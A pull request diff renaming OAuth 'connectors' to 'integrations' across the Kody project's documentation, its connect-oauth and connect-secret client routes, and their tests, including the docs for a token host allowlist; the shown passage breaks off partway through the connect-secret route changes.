### PR TITLE
Rename saved OAuth connectors to integrations

### DIFF
--- a/docs/contributing/architecture/index.md
+++ b/docs/contributing/architecture/index.md
@@ -25,7 +25,7 @@ to become.
   for securely reaching local-network systems through an outbound agent
   connection.
 
-## OAuth connector host allowlist
+## OAuth integration host allowlist
 
 The `createAuthenticatedFetch` helper (and its sandboxed prelude equivalent)
 attaches a materialized OAuth bearer token to outbound requests. At that point,
@@ -34,17 +34,17 @@ host-allowlist check cannot inspect it. To prevent token exfiltration to
 arbitrary hosts:
 
 - Before attaching the `Authorization` header, the helper resolves the
-  connector's allowed host set from `requiredHosts` plus the host of
+  integration's allowed host set from `requiredHosts` plus the host of
   `apiBaseUrl`.
 - If the outbound request URL targets a host **not** in that set, the helper
-  throws `ConnectorHostNotAllowedError` without making the network request and
+  throws `IntegrationHostNotAllowedError` without making the network request and
   without including the token value in the error message.
 - The reusable enforcement logic lives in
-  `packages/worker/src/mcp/execute-modules/connector-host-allowlist.ts`
-  (`assertConnectorHostAllowed`, `getConnectorAllowedHosts`).
+  `packages/worker/src/mcp/execute-modules/integration-host-allowlist.ts`
+  (`assertIntegrationHostAllowed`, `getIntegrationAllowedHosts`).
 
-This invariant must hold for any code path that materializes a connector token
-and then attaches it to an outbound request.
+This invariant must hold for any code path that materializes an integration
+token and then attaches it to an outbound request.
 
 ## Source of truth in code
 

--- a/docs/contributing/packages-and-manifests.md
+++ b/docs/contributing/packages-and-manifests.md
@@ -135,7 +135,7 @@ await workflows.create({
 Kody stores Cloudflare Workflow instance payloads as package-routing metadata:
 `userId`, package id, `kody.id`, source id, workflow name, export name,
 idempotency key, `runAt`/plan date, and small non-secret params. Do not place
-secrets, OAuth tokens, full connector configuration, or full device action
+secrets, OAuth tokens, full integration configuration, or full device action
 payloads in workflow params or metadata. The package export should look up
 current secrets/configuration from normal package runtime helpers when it runs.
 

--- a/docs/guides/connect-secret.md
+++ b/docs/guides/connect-secret.md
@@ -24,7 +24,7 @@ Do **not** ask the user to paste secrets into chat.
 
 Provide the user a URL like:
 
-`https://heykody.dev/connect/secret?name=linearApiKey&description=Linear%20API%20key&allowedHosts=api.linear.app&scope=user&dashboardUrl=https://linear.app/settings/api&instructions=Go%20to%20Linear%20Settings%20%E2%86%92%20API%20%E2%86%92%20Personal%20API%20Keys%20%E2%86%92%20Create%20key&allowedCapabilities=linear_issue_list,linear_issue_create&allowedPackages=pkg_123&connector=linear`
+`https://heykody.dev/connect/secret?name=linearApiKey&description=Linear%20API%20key&allowedHosts=api.linear.app&scope=user&dashboardUrl=https://linear.app/settings/api&instructions=Go%20to%20Linear%20Settings%20%E2%86%92%20API%20%E2%86%92%20Personal%20API%20Keys%20%E2%86%92%20Create%20key&allowedCapabilities=linear_issue_list,linear_issue_create&allowedPackages=pkg_123&integration=linear`
 
 ## Query params
 
@@ -39,7 +39,7 @@ Provide the user a URL like:
 | `appId`               | no       | Required when `scope=app`. Use the saved package id that owns the package app or package-owned secret scope.               |
 | `dashboardUrl`        | no       | Provider settings link for creating the key.                                                                               |
 | `instructions`        | no       | Step-by-step instructions shown on the page.                                                                               |
-| `connector`           | no       | Writes `_connector-secret:{connector}` secret-binding metadata on save.                                                    |
+| `integration`         | no       | Writes `_integration-secret:{integration}` secret-binding metadata on save.                                                |
 
 ## Approval policy reminders
 

--- a/docs/guides/generated-ui-oauth.md
+++ b/docs/guides/generated-ui-oauth.md
@@ -4,7 +4,7 @@
 sufficient** and the integration needs a hosted package app callback or a custom
 browser-first OAuth experience.
 
-For standard third-party OAuth, use the normal hosted connector path from
+For standard third-party OAuth, use the normal hosted integration path from
 [OAuth guide](./oauth.md).
 
 ## When to use this guide

--- a/docs/guides/integration-backed-app-happy-path.md
+++ b/docs/guides/integration-backed-app-happy-path.md
@@ -1,18 +1,18 @@
 # Integration-backed package app happy path
 
 Use this guide after `integration_bootstrap` proves the integration already
-works, or when connector and secret state are already clear enough to verify
+works, or when integration and secret state are already clear enough to verify
 quickly.
 
 ## Recommended sequence
 
-1. Discover connector and secret state.
-   - Use `search` to inspect saved connectors and secret references.
-   - Read full connector metadata only when you need the exact names, hosts, or
-     API base URL.
-2. Verify the required connector exists.
-   - Confirm the connector name, token secret names, and API base URL match the
-     app you are about to build.
+1. Discover integration and secret state.
+   - Use `search` to inspect saved integrations and secret references.
+   - Read full integration metadata only when you need the exact names, hosts,
+     or API base URL.
+2. Verify the required integration exists.
+   - Confirm the integration name, token secret names, and API base URL match
+     the app you are about to build.
 3. Run one cheap authenticated smoke test in `execute`.
    - Prefer a small read-only request such as `GET /me`, `GET /viewer`, or
      `GET /v1/me`.
@@ -34,14 +34,14 @@ For non-trivial or integration-backed package apps, prefer this split:
   `package.json#kody.app.entry`
 - package exports: reusable modules and callable default exports declared in
   `package.json.exports`
-- internal backend modules / Durable Objects / facets: connector lookups,
+- internal backend modules / Durable Objects / facets: integration lookups,
   provider API calls, persistence, validation, and mutations
 - inline HTML/code renders: acceptable for quick prototypes or one-off
   experiments, not the default package app pattern
 
 ## Avoid this detour
 
-If the connector state, secret names, allowed hosts, and provider contract are
+If the integration state, secret names, allowed hosts, and provider contract are
 already clear enough, do **not** spend extra time spelunking the local repo
 before building the app.
 

--- a/docs/guides/integration-bootstrap.md
+++ b/docs/guides/integration-bootstrap.md
@@ -12,7 +12,7 @@ apps that depend on it.
 
 Use this workflow when the requested result depends on any of the following:
 
-- an OAuth connector
+- an OAuth integration
 - a saved secret such as an API key or PAT
 - host approvals for outbound API calls
 - a saved package or package app that assumes authenticated API access already
@@ -23,7 +23,7 @@ Use this workflow when the requested result depends on any of the following:
 Do **not** save or present an auth-dependent package or package app as complete
 until:
 
-1. the required connector or secret exists
+1. the required integration or secret exists
 2. the user has finished any required connect flow
 3. a minimal authenticated smoke test succeeds end-to-end
 
@@ -41,12 +41,12 @@ If those conditions are not met, stop and fix the integration first.
      `guide: "generated_ui_oauth"` only when you deliberately need the package
      app callback flow.
 2. Inspect current integration state before building downstream artifacts.
-   - Use `search` to look for saved connectors and secret references for the
+   - Use `search` to look for saved integrations and secret references for the
      integration.
    - When you need one item’s full metadata, inspect it with
-     `search({ entity: "{id}:connector" })` or
+     `search({ entity: "{id}:integration" })` or
      `search({ entity: "{id}:secret" })`.
-3. If the required connector or secret is missing, **stop**.
+3. If the required integration or secret is missing, **stop**.
    - Surface the exact `/connect/oauth` or `/connect/secret` URL in chat.
    - Wait for the user to confirm they completed the connect flow.
    - Do not save a downstream auth-dependent package or package app until
@@ -60,14 +60,14 @@ If those conditions are not met, stop and fix the integration first.
    - Use the real auth path the final integration will use.
    - Prefer a cheap read-only request such as `GET /me`, `GET /viewer`, or a
      similarly small account/profile endpoint.
-   - Confirm the connector or secret name, token refresh behavior, and allowed
+   - Confirm the integration or secret name, token refresh behavior, and allowed
      hosts all work end-to-end.
 5. Only after the smoke test succeeds should you build or save the dependent
    package or package app.
-   - If the connector or tokens already exist and the smoke test passes, proceed
-     directly to package construction.
-   - Do not spend extra time exploring the local repo when the connector state,
-     secret names, allowed hosts, and provider contract are already clear
+   - If the integration or tokens already exist and the smoke test passes,
+     proceed directly to package construction.
+   - Do not spend extra time exploring the local repo when the integration
+     state, secret names, allowed hosts, and provider contract are already clear
      enough.
    - For the default package-app structure after bootstrap, load
      `kody_official_guide` with `guide: "integration_backed_app"`.
@@ -79,11 +79,12 @@ If those conditions are not met, stop and fix the integration first.
 The smoke test should prove the same auth wiring the final package or package
 app will depend on:
 
-- the expected connector or secret exists
+- the expected integration or secret exists
 - the request reaches the intended API host
 - the request is authenticated successfully
 - any required host approvals are in place
-- the agent is using the correct secret names, connector name, and API base URL
+- the agent is using the correct secret names, integration name, and API base
+  URL
 
 ## Important exceptions
 
@@ -94,7 +95,7 @@ Even in that case:
 
 - the package app should be treated as the **setup** surface, not the finished
   downstream integration
-- any later package or package app that depends on the resulting connector or
+- any later package or package app that depends on the resulting integration or
   tokens should wait until the post-connect smoke test passes
 
 ## Recommended phrasing in chat
@@ -112,7 +113,7 @@ When setup is incomplete, tell the user what must happen next in concrete terms:
 Avoid these common mistakes:
 
 - building a polished UI first and only discovering later that auth is missing
-- saving a package app that assumes a non-existent secret or connector
+- saving a package app that assumes a non-existent secret or integration
 - treating a rendered app as success when the first authenticated API call fails
 - using `generated_ui_oauth` by default instead of the standard `/connect/oauth`
   path

--- a/docs/guides/oauth.md
+++ b/docs/guides/oauth.md
@@ -4,7 +4,7 @@ Read this guide first for third-party OAuth (GitHub, Linear, Spotify, and
 similar providers).
 
 This guide covers the standard hosted OAuth path. Use it before building a
-package or package app that depends on the resulting connector or tokens.
+package or package app that depends on the resulting integration or tokens.
 
 ## Default path: `/connect/oauth`
 
@@ -54,12 +54,13 @@ with `allowedHosts` when needed.
 Client ID, access token, and refresh token names are derived from a normalized
 slug of `provider`.
 
-## Connector naming convention
+## Integration naming convention
 
-Prefer connector names like `<provider>-<purpose>` when multiple accounts may
+Prefer integration names like `<provider>-<purpose>` when multiple accounts may
 exist: `google` for the primary account, `google-business` for a business
 account, or `google-youtube-brand` for a brand identity. Agents should call
-`connector_list` up front when a provider may have multiple accounts connected.
+`integration_list` up front when a provider may have multiple accounts
+connected.
 
 ## Not the same as MCP OAuth
 

--- a/docs/guides/secret-backed-integration.md
+++ b/docs/guides/secret-backed-integration.md
@@ -1,7 +1,7 @@
 # Secret-backed integration recipe
 
 Use this guide after `integration_bootstrap` when the integration uses one or
-more saved secrets instead of an OAuth connector.
+more saved secrets instead of an OAuth integration.
 
 This is the default path for many automation-oriented integrations:
 

--- a/docs/use/execute.md
+++ b/docs/use/execute.md
@@ -21,7 +21,7 @@ helpers are runtime exports:
 - use **`import { codemode } from 'kody:runtime'`** to call builtin capabilities
 - use
   **`import { refreshAccessToken, createAuthenticatedFetch } from 'kody:runtime'`**
-  for connector OAuth helpers
+  for integration OAuth helpers
 - use **`import { storage } from 'kody:runtime'`** when the execute call is
   bound to a storage id
 - use **`import { agentChatTurnStream } from 'kody:runtime'`** for streamed
@@ -233,9 +233,9 @@ contexts. OAuth helpers are imported from **`kody:runtime`**:
 
 **`import { refreshAccessToken, createAuthenticatedFetch } from 'kody:runtime'`**
 
-Connector names should usually follow `<provider>-<purpose>` when multiple
+Integration names should usually follow `<provider>-<purpose>` when multiple
 accounts may exist, such as `google`, `google-business`, or
-`google-youtube-brand`. Call **`connector_list`** up front when a provider may
+`google-youtube-brand`. Call **`integration_list`** up front when a provider may
 have multiple accounts connected.
 
 See [Secrets, values, and host approval](./secrets-and-values.md) for

--- a/docs/use/first-steps.md
+++ b/docs/use/first-steps.md
@@ -2,7 +2,7 @@
 
 Kody exposes **search**, **execute**, and **open generated UI** as the main
 tools. The agent should **search first** to find the right capability, package,
-connector, value, or secret reference, then run work through **execute**.
+integration, value, or secret reference, then run work through **execute**.
 
 ## Habits that help
 

--- a/docs/use/search.md
+++ b/docs/use/search.md
@@ -1,7 +1,7 @@
 # Search
 
 The **search** tool finds **built-in capabilities**, **saved packages**,
-**persisted values**, **saved connectors**, and **user secret references**
+**persisted values**, **saved integrations**, and **user secret references**
 (metadata only, not secret values).
 
 ## Queries and ranking
@@ -28,15 +28,15 @@ response must stay small.
 To get **full markdown and call shapes for one hit** (for example a capability’s
 `inputTypeDefinition` / `outputTypeDefinition`), call **search** again with
 **`entity`** set to `"{id}:{type}"` where **`type`** is `capability`, `value`,
-`connector`, `package`, or `secret`.
+`integration`, `package`, or `secret`.
 
 Examples:
 
 - `kody_official_guide:capability`
 - `user:preferred_org:value`
-- `github:connector`
+- `github:integration`
 - `my-package:package`
-- `spotify:connector`
+- `spotify:integration`
 - `spotify-access-token:secret`
 
 There is **no separate `detail` flag** on search. Deeper inspection of one
@@ -59,15 +59,15 @@ for an empty ranked list.
 Saved **packages** require a signed-in MCP user. Capabilities and built-in
 behavior work without user-scoped data.
 
-Package and connector query hits stay summary-only. Exact package detail
+Package and integration query hits stay summary-only. Exact package detail
 (`entity: "my-package:package"`) includes package app, export, job, retriever,
-and README metadata. Exact connector detail (`entity: "github:connector"`)
+and README metadata. Exact integration detail (`entity: "github:integration"`)
 includes operational details such as token URL, API base URL, required hosts,
 and related stored value/secret names.
 
 Long-term memory retrieval also requires a signed-in MCP user.
 
-Use **search** as the default way to discover whether a connector or secret
+Use **search** as the default way to discover whether an integration or secret
 already exists before switching to **execute**. Runtime code inside **execute**
 can call **`codemode.secret_list(...)`** when it needs secret metadata, but
 **search** is the primary discovery path.

--- a/docs/use/secrets-and-values.md
+++ b/docs/use/secrets-and-values.md
@@ -6,7 +6,7 @@ Secret **values** do not belong in chat. Prefer **saved secrets**, **generated
 UI** flows, or execution-time persistence when a token already exists inside
 trusted code.
 
-Use **search** first to discover saved secret references or connectors before
+Use **search** first to discover saved secret references or integrations before
 switching to **execute**.
 
 During **execute**, **`await codemode.secret_list({})`** (or a narrowed

--- a/packages/worker/client/routes/connect-oauth.node.test.ts
+++ b/packages/worker/client/routes/connect-oauth.node.test.ts
@@ -1,14 +1,14 @@
 import { expect, test } from 'vitest'
 import {
-	buildConnectorValueName,
-	getConnectorValueCandidates,
+	buildIntegrationValueName,
+	getIntegrationValueCandidates,
 	mergeConnectOauthConfig,
-	parseStoredConnectorConfig,
+	parseStoredIntegrationConfig,
 	summarizeStoredSetupState,
 } from './connect-oauth.tsx'
 
-test('parseStoredConnectorConfig returns normalized connector config', () => {
-	const parsed = parseStoredConnectorConfig(
+test('parseStoredIntegrationConfig returns normalized integration config', () => {
+	const parsed = parseStoredIntegrationConfig(
 		JSON.stringify({
 			name: 'GitHub',
 			tokenUrl: 'https://github.com/login/oauth/access_token',
@@ -36,18 +36,18 @@ test('parseStoredConnectorConfig returns normalized connector config', () => {
 	})
 })
 
-test('getConnectorValueCandidates prefers provider and normalized key without duplicates', () => {
-	expect(getConnectorValueCandidates('GitHub', 'github')).toEqual([
-		buildConnectorValueName('GitHub'),
-		buildConnectorValueName('github'),
+test('getIntegrationValueCandidates prefers provider and normalized key without duplicates', () => {
+	expect(getIntegrationValueCandidates('GitHub', 'github')).toEqual([
+		buildIntegrationValueName('GitHub'),
+		buildIntegrationValueName('github'),
 	])
 
-	expect(getConnectorValueCandidates('github', 'github')).toEqual([
-		buildConnectorValueName('github'),
+	expect(getIntegrationValueCandidates('github', 'github')).toEqual([
+		buildIntegrationValueName('github'),
 	])
 })
 
-test('mergeConnectOauthConfig prefers stored connector metadata for saved providers', () => {
+test('mergeConnectOauthConfig prefers stored integration metadata for saved providers', () => {
 	const config = mergeConnectOauthConfig({
 		queryConfig: {
 			provider: 'github',
@@ -64,7 +64,7 @@ test('mergeConnectOauthConfig prefers stored connector metadata for saved provid
 			dashboardUrl: 'https://github.com/settings/developers',
 			allowedHosts: ['github.com'],
 		},
-		storedConnector: {
+		storedIntegration: {
 			name: 'GitHub',
 			tokenUrl: 'https://github.com/login/oauth/access_token',
 			apiBaseUrl: 'https://api.github.com',
@@ -99,7 +99,7 @@ test('mergeConnectOauthConfig prefers stored connector metadata for saved provid
 	})
 })
 
-test('mergeConnectOauthConfig falls back to derived names when no connector exists', () => {
+test('mergeConnectOauthConfig falls back to derived names when no integration exists', () => {
 	const config = mergeConnectOauthConfig({
 		queryConfig: {
 			provider: 'spotify',
@@ -116,7 +116,7 @@ test('mergeConnectOauthConfig falls back to derived names when no connector exis
 			dashboardUrl: null,
 			allowedHosts: ['accounts.spotify.com'],
 		},
-		storedConnector: null,
+		storedIntegration: null,
 	})
 
 	expect(config).toMatchObject({

--- a/packages/worker/client/routes/connect-oauth.tsx
+++ b/packages/worker/client/routes/connect-oauth.tsx
@@ -64,7 +64,7 @@ type ConnectOauthConfig = {
 	allowedHosts: Array<string>
 }
 
-type StoredConnectorConfig = {
+type StoredIntegrationConfig = {
 	name: string
 	tokenUrl: string
 	apiBaseUrl: string | null
@@ -109,8 +109,8 @@ export function ConnectOauthRoute(handle: Handle) {
 	let statusTone: StatusTone = 'info'
 	let currentStep: 'setup' | 'connect' | 'callback' | 'success' = 'setup'
 	let config: ConnectOauthConfig | null = null
-	let existingConnectorConfig: StoredConnectorConfig | null = null
-	let existingConnectorValueName: string | null = null
+	let existingIntegrationConfig: StoredIntegrationConfig | null = null
+	let existingIntegrationValueName: string | null = null
 	let accessTokenSaved = false
 	let refreshTokenSaved = false
 	let hasConfigError = false
@@ -376,26 +376,26 @@ export function ConnectOauthRoute(handle: Handle) {
 		return payload.secrets
 	}
 
-	const readExistingConnectorConfig = async (
+	const readExistingIntegrationConfig = async (
 		queryConfig: ConnectOauthQueryConfig,
 	) => {
-		for (const valueName of getConnectorValueCandidates(
+		for (const valueName of getIntegrationValueCandidates(
 			queryConfig.provider,
 			queryConfig.providerKey,
 		)) {
 			const raw = await readValue(valueName)
 			if (!raw) continue
-			const parsed = parseStoredConnectorConfig(raw, queryConfig.provider)
+			const parsed = parseStoredIntegrationConfig(raw, queryConfig.provider)
 			if (parsed) {
 				return {
 					valueName,
-					connector: parsed,
+					integration: parsed,
 				}
 			}
 		}
 		return {
 			valueName: null,
-			connector: null,
+			integration: null,
 		}
 	}
 
@@ -423,8 +423,8 @@ export function ConnectOauthRoute(handle: Handle) {
 		})
 		if (setupStatus.isReady) {
 			setStatus(
-				existingConnectorConfig
-					? 'Loaded your existing connector config and client credentials. Ready to connect.'
+				existingIntegrationConfig
+					? 'Loaded your existing integration config and client credentials. Ready to connect.'
 					: 'Loaded your existing OAuth client configuration. Ready to connect.',
 			)
 			setStep('connect')
@@ -432,8 +432,8 @@ export function ConnectOauthRoute(handle: Handle) {
 		}
 		const missingDetails = formatMissingSetupFields(setupStatus.missingFields)
 		setStatus(
-			existingConnectorConfig
-				? `Loaded your existing connector config. ${missingDetails}`
+			existingIntegrationConfig
+				? `Loaded your existing integration config. ${missingDetails}`
 				: missingDetails,
 		)
 		setStep('setup')
@@ -731,16 +731,16 @@ export function ConnectOauthRoute(handle: Handle) {
 		)
 	}
 
-	const renderExistingConnectorConfig = () => {
-		if (!existingConnectorConfig) return null
+	const renderExistingIntegrationConfig = () => {
+		if (!existingIntegrationConfig) return null
 		return (
 			<section mix={css(cardCss)}>
-				<h2 mix={css(cardTitleCss)}>Existing connector config</h2>
+				<h2 mix={css(cardTitleCss)}>Existing integration config</h2>
 				<p mix={css(descriptionCss)}>
 					Loaded from{' '}
 					<code>
-						{existingConnectorValueName ??
-							buildConnectorValueName(config?.provider ?? '')}
+						{existingIntegrationValueName ??
+							buildIntegrationValueName(config?.provider ?? '')}
 					</code>
 					.
 				</p>
@@ -748,45 +748,45 @@ export function ConnectOauthRoute(handle: Handle) {
 					<div mix={css(detailItemCss)}>
 						<span mix={css(detailLabelCss)}>Flow</span>
 						<span mix={css(detailValueCss)}>
-							{existingConnectorConfig.flow}
+							{existingIntegrationConfig.flow}
 						</span>
 					</div>
 					<div mix={css(detailItemCss)}>
 						<span mix={css(detailLabelCss)}>Token URL</span>
-						<code>{existingConnectorConfig.tokenUrl}</code>
+						<code>{existingIntegrationConfig.tokenUrl}</code>
 					</div>
-					{existingConnectorConfig.apiBaseUrl ? (
+					{existingIntegrationConfig.apiBaseUrl ? (
 						<div mix={css(detailItemCss)}>
 							<span mix={css(detailLabelCss)}>API base URL</span>
-							<code>{existingConnectorConfig.apiBaseUrl}</code>
+							<code>{existingIntegrationConfig.apiBaseUrl}</code>
 						</div>
 					) : null}
 					<div mix={css(detailItemCss)}>
 						<span mix={css(detailLabelCss)}>Client ID value</span>
-						<code>{existingConnectorConfig.clientIdValueName}</code>
+						<code>{existingIntegrationConfig.clientIdValueName}</code>
 					</div>
 					<div mix={css(detailItemCss)}>
 						<span mix={css(detailLabelCss)}>Client secret secret</span>
 						<code>
-							{existingConnectorConfig.clientSecretSecretName ?? 'Not used'}
+							{existingIntegrationConfig.clientSecretSecretName ?? 'Not used'}
 						</code>
 					</div>
 					<div mix={css(detailItemCss)}>
 						<span mix={css(detailLabelCss)}>Access token secret</span>
-						<code>{existingConnectorConfig.accessTokenSecretName}</code>
+						<code>{existingIntegrationConfig.accessTokenSecretName}</code>
 					</div>
 					<div mix={css(detailItemCss)}>
 						<span mix={css(detailLabelCss)}>Refresh token secret</span>
 						<code>
-							{existingConnectorConfig.refreshTokenSecretName ?? 'Not used'}
+							{existingIntegrationConfig.refreshTokenSecretName ?? 'Not used'}
 						</code>
 					</div>
 				</div>
 				<div mix={css(insetCardCss)}>
 					<strong mix={css(sectionTitleCss)}>Required hosts</strong>
-					{existingConnectorConfig.requiredHosts.length > 0 ? (
+					{existingIntegrationConfig.requiredHosts.length > 0 ? (
 						<ul mix={css(listCss)}>
-							{existingConnectorConfig.requiredHosts.map((host) => (
+							{existingIntegrationConfig.requiredHosts.map((host) => (
 								<li key={host}>{host}</li>
 							))}
 						</ul>
@@ -810,8 +810,9 @@ export function ConnectOauthRoute(handle: Handle) {
 				(queryConfig
 					? mergeConnectOauthConfig({
 							queryConfig,
-							storedConnector: (await readExistingConnectorConfig(queryConfig))
-								.connector,
+							storedIntegration: (
+								await readExistingIntegrationConfig(queryConfig)
+							).integration,
 						})
 					: null)
 			if (!nextConfig) {
@@ -830,12 +831,12 @@ export function ConnectOauthRoute(handle: Handle) {
 			setStatus('Missing required OAuth configuration parameters.', 'error')
 			return
 		}
-		const existingConnector = await readExistingConnectorConfig(queryConfig)
-		existingConnectorConfig = existingConnector.connector
-		existingConnectorValueName = existingConnector.valueName
+		const existingIntegration = await readExistingIntegrationConfig(queryConfig)
+		existingIntegrationConfig = existingIntegration.integration
+		existingIntegrationValueName = existingIntegration.valueName
 		const nextConfig = mergeConnectOauthConfig({
 			queryConfig,
-			storedConnector: existingConnector.connector,
+			storedIntegration: existingIntegration.integration,
 		})
 		if (!nextConfig) {
 			hasConfigError = true
@@ -915,11 +916,11 @@ export function ConnectOauthRoute(handle: Handle) {
 						</a>
 					) : null}
 				</section>
-				{renderExistingConnectorConfig()}
+				{renderExistingIntegrationConfig()}
 				{currentStep === 'setup' ? (
 					<section mix={css(cardCss)}>
 						<h2 mix={css(cardTitleCss)}>
-							1. {existingConnectorConfig ? 'Review' : 'Save'} OAuth client
+							1. {existingIntegrationConfig ? 'Review' : 'Save'} OAuth client
 							configuration
 						</h2>
 						{renderProviderInstructions()}
@@ -1024,7 +1025,7 @@ export function ConnectOauthRoute(handle: Handle) {
 						<p mix={css({ margin: 0, color: colors.text })}>
 							Start the OAuth flow. You will be redirected to the provider.
 						</p>
-						{existingConnectorConfig ? (
+						{existingIntegrationConfig ? (
 							<p mix={css(descriptionCss)}>
 								Using stored client ID <code>{config.clientIdValueName}</code>
 								{config.flow === 'confidential' && hasStoredClientSecret
@@ -1136,11 +1137,11 @@ export function normalizeHosts(hosts: Array<string>) {
 	).sort()
 }
 
-export function buildConnectorValueName(provider: string) {
-	return `_connector:${provider}`
+export function buildIntegrationValueName(provider: string) {
+	return `_integration:${provider}`
 }
 
-export function getConnectorValueCandidates(
+export function getIntegrationValueCandidates(
 	provider: string,
 	providerKey: string,
 ) {
@@ -1148,15 +1149,15 @@ export function getConnectorValueCandidates(
 		new Set(
 			[provider.trim(), providerKey.trim()]
 				.filter((value) => value.length > 0)
-				.map((value) => buildConnectorValueName(value)),
+				.map((value) => buildIntegrationValueName(value)),
 		),
 	)
 }
 
-export function parseStoredConnectorConfig(
+export function parseStoredIntegrationConfig(
 	raw: string,
 	fallbackProvider: string | null,
-): StoredConnectorConfig | null {
+): StoredIntegrationConfig | null {
 	try {
 		const parsed = JSON.parse(raw) as Record<string, unknown>
 		const name =
@@ -1213,24 +1214,25 @@ export function parseStoredConnectorConfig(
 
 export function mergeConnectOauthConfig(input: {
 	queryConfig: ConnectOauthQueryConfig
-	storedConnector: StoredConnectorConfig | null
+	storedIntegration: StoredIntegrationConfig | null
 }): ConnectOauthConfig | null {
 	const provider =
-		input.storedConnector?.name.trim() || input.queryConfig.provider.trim()
+		input.storedIntegration?.name.trim() || input.queryConfig.provider.trim()
 	const providerKey = normalizeProviderKey(
 		provider || input.queryConfig.providerKey,
 	)
 	const authorizeHost = safeParseHost(input.queryConfig.authorizeUrl)
-	const tokenUrl = input.storedConnector?.tokenUrl ?? input.queryConfig.tokenUrl
+	const tokenUrl =
+		input.storedIntegration?.tokenUrl ?? input.queryConfig.tokenUrl
 	const tokenHost = tokenUrl ? safeParseHost(tokenUrl) : null
 	if (!provider || !authorizeHost || !tokenUrl || !tokenHost || !providerKey) {
 		return null
 	}
-	const flow = input.storedConnector?.flow ?? input.queryConfig.flow ?? 'pkce'
+	const flow = input.storedIntegration?.flow ?? input.queryConfig.flow ?? 'pkce'
 	const allowedHosts = normalizeHosts([
 		tokenHost,
 		...input.queryConfig.allowedHosts,
-		...(input.storedConnector?.requiredHosts ?? []),
+		...(input.storedIntegration?.requiredHosts ?? []),
 	])
 	if (allowedHosts.length === 0) return null
 	return {
@@ -1241,7 +1243,7 @@ export function mergeConnectOauthConfig(input: {
 		authorizeUrl: input.queryConfig.authorizeUrl,
 		tokenUrl,
 		apiBaseUrl:
-			input.storedConnector?.apiBaseUrl ?? input.queryConfig.apiBaseUrl,
+			input.storedIntegration?.apiBaseUrl ?? input.queryConfig.apiBaseUrl,
 		scopes: input.queryConfig.scopes,
 		flow,
 		scopeSeparator: input.queryConfig.scopeSeparator,
@@ -1249,17 +1251,17 @@ export function mergeConnectOauthConfig(input: {
 		providerSetupInstructions: input.queryConfig.providerSetupInstructions,
 		dashboardUrl: input.queryConfig.dashboardUrl,
 		clientIdValueName:
-			input.storedConnector?.clientIdValueName ?? `${providerKey}-client-id`,
+			input.storedIntegration?.clientIdValueName ?? `${providerKey}-client-id`,
 		clientSecretSecretName:
 			flow === 'confidential'
-				? (input.storedConnector?.clientSecretSecretName ??
+				? (input.storedIntegration?.clientSecretSecretName ??
 					`${providerKey}ClientSecret`)
 				: null,
 		accessTokenSecretName:
-			input.storedConnector?.accessTokenSecretName ??
+			input.storedIntegration?.accessTokenSecretName ??
 			`${providerKey}AccessToken`,
 		refreshTokenSecretName:
-			input.storedConnector?.refreshTokenSecretName ??
+			input.storedIntegration?.refreshTokenSecretName ??
 			`${providerKey}RefreshToken`,
 		allowedHosts,
 	}

--- a/packages/worker/client/routes/connect-secret-errors.ts
+++ b/packages/worker/client/routes/connect-secret-errors.ts
@@ -1,4 +1,4 @@
-export function formatConnectorConfigFailureMessage(
+export function formatIntegrationConfigFailureMessage(
 	error: unknown,
 	options: {
 		secretRolledBack: boolean
@@ -8,11 +8,11 @@ export function formatConnectorConfigFailureMessage(
 	const message =
 		error instanceof Error
 			? error.message
-			: 'Unable to update connector config.'
+			: 'Unable to update integration config.'
 	if (options.updatedSecretRetained) {
-		return `Connector configuration failed after the secret was updated. ${message}`
+		return `Integration configuration failed after the secret was updated. ${message}`
 	}
 	return options.secretRolledBack
-		? `Connector configuration failed and the secret was rolled back. ${message}`
-		: `Connector configuration failed after the secret was saved. ${message}`
+		? `Integration configuration failed and the secret was rolled back. ${message}`
+		: `Integration configuration failed after the secret was saved. ${message}`
 }

--- a/packages/worker/client/routes/connect-secret.tsx
+++ b/packages/worker/client/routes/connect-secret.tsx
@@ -20,7 +20,7 @@ import {
 	normalizeAllowedHosts,
 	normalizeAllowedPackages,
 } from './secret-normalization.ts'
-import { formatConnectorConfigFailureMessage } from './connect-secret-errors.ts'
+import { formatIntegrationConfigFailureMessage } from './connect-secret-errors.ts'
 
 type StorageScope = 'app' | 'session' | 'user'
 type ViewStep =
@@ -54,7 +54,7 @@ type ConnectSecretParams = {
 	scope: StorageScope
 	dashboardUrl: string
 	instructions: string
-	connector: string
+	integration: string
 }
 
 type ConnectSecretState = {
@@ -125,7 +125,7 @@ function parseConnectSecretParams(): ConnectSecretParams {
 	const description = params.get('description')?.trim() ?? ''
 	const instructions = params.get('instructions')?.trim() ?? ''
 	const dashboardUrl = params.get('dashboardUrl')?.trim() ?? ''
-	const connector = params.get('connector')?.trim() ?? ''
+	const integration = params.get('integration')?.trim() ?? ''
 	const scope = parseScope(params.get('scope'))
 	const allowedHosts = parseCommaList(params.get('allowedHosts'), (value) =>
 		value.toLowerCase(),
@@ -145,7 +145,7 @@ function parseConnectSecretParams(): ConnectSecretParams {
 		scope,
 		dashboardUrl,
 		instructions,
-		connector,
+		integration,
 	}
 }
 
@@ -293,7 +293,7 @@ async function saveSecretValue(
 	}
 }
 
-async function updateConnectorConfig(
+async function updateIntegrationConfig(
 	params: ConnectSecretParams,
 	session: ConnectSecretSession,
 	input: {
@@ -302,7 +302,7 @@ async function updateConnectorConfig(
 		allowedPackages: Array<string>
 	},
 ) {
-	if (!params.connector) return
+	if (!params.integration) return
 	const response = await fetch('/connect/secret.json', {
 		method: 'POST',
 		headers: {
@@ -314,7 +314,7 @@ async function updateConnectorConfig(
 			name: params.name,
 			scope: params.scope,
 			sessionToken: session.token,
-			connector: params.connector,
+			integration: params.integration,
 			allowedHosts: input.allowedHosts,
 			allowedCapabilities: input.allowedCapabilities,
 			allowedPackages: input.allowedPackages,
@@ -325,7 +325,7 @@ async function updateConnectorConfig(
 		error?: string
 	}
 	if (!response.ok || !payload?.ok) {
-		throw new Error(payload?.error || 'Unable to update connector config.')
+		throw new Error(payload?.error || 'Unable to update integration config.')
 	}
 }
 
@@ -475,7 +475,7 @@ export function ConnectSecretRoute(handle: Handle) {
 			return
 		}
 		try {
-			await updateConnectorConfig(currentParams, session, {
+			await updateIntegrationConfig(currentParams, session, {
 				allowedHosts: normalizedAllowedHosts,
 				allowedCapabilities: normalizedAllowedCapabilities,
 				allowedPackages: normalizedAllowedPackages,
@@ -483,7 +483,7 @@ export function ConnectSecretRoute(handle: Handle) {
 			setState({ step: 'success' })
 		} catch (error) {
 			const secretWasNewlyCreated = targetExistingSecret == null
